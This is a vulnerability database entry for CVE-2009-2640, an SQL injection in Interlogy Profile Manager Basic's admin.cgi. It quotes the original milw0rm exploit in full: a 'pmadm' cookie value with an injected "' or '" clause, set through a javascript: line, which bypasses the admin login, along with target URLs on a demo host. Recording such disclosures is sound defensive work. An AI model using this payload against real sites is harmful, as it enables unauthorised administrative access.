Interlogy Profile Manager Basic cgi/admin.cgi Script Multiple SQL Injection Vulnerabilities

Vulnerability ID: 1117920    Vulnerability type: SQL injection
Published: 2009-06-08    Updated: 2009-06-08
CVE ID: CVE-2009-2640    CNNVD-ID: CNNVD-200907-401
Platform: CGI    CVSS score: 7.5
|Vulnerability source
https://www.exploit-db.com/exploits/8895
https://www.securityfocus.com/bid/44438
https://cxsecurity.com/issue/WLB-2009070211
http://www.cnnvd.org.cn/web/xxk/ldxqById.tag?CNNVD=CNNVD-200907-401
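|Vulnerability details
Multiple SQL injection vulnerabilities in cgi/admin.cgi in Interlogy Profile Manager Basic allow remote attackers to execute arbitrary SQL commands via the pmadm cookie in the (1) edittemp or (2) users action.
|Exploit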
[~] interlogy Profile Manager Basic (for ByPass) Insecure Cookie Handling Vulnerability 
[~]
[~] ----------------------------------------------------------
[~] Discovered By: ZoRLu
[~]
[~] Date: 06/06/2009
[~]
[~] Home: yildirimordulari.com / z0rlu.blogspot.com 
[~]
[~] msn: trt-turk@hotmail.com
[~] 
[~] N0T: Kpss AnanI ....
[~] -----------------------------------------------------------

desc:

normal login for cookie

pmadm=dGVzdA;

if I do this:

pmadm=dGVzd(write any thing);

example:

pmadm=dGVzdz;  

or

pmadm=dGVzd123231212313;

not login 

if I do this:

pmadm=dGVzd ' or ';

boom this login :D

exp:

javascript:document.cookie = "pmadm=dGVzd ' or '; path=/";

after you go here:

http://demo.interlogy.com/pm3/cgi/admin.cgi?action=edittemp

or http://demo.interlogy.com/pm3/cgi/admin.cgi?action=users

[~]----------------------------------------------------------------------
[~] Greetz tO: str0ke & DrLy0N & w0cker & Cyber-Zone & Stack & ThE g0bL!N & AlpHaNiX  and all friends
[~]
[~] yildirimordulari.com / z0rlu.blogspot.com
[~]
[~]----------------------------------------------------------------------

# milw0rm.com [2009-06-08]
|Affected products
Interlogy LLC Profile Manager Basic 0
|References

Source: XF
Name: profilemanager-pmadm-security-bypass(50992)
Link: http://xforce.iss.net/xforce/xfdb/50992
Source: VUPEN
Name: ADV-2009-1529
Link: http://www.vupen.com/english/advisories/2009/1529
Source: MILW0RM
Name: 8895
Link: http://www.milw0rm.com/exploits/8895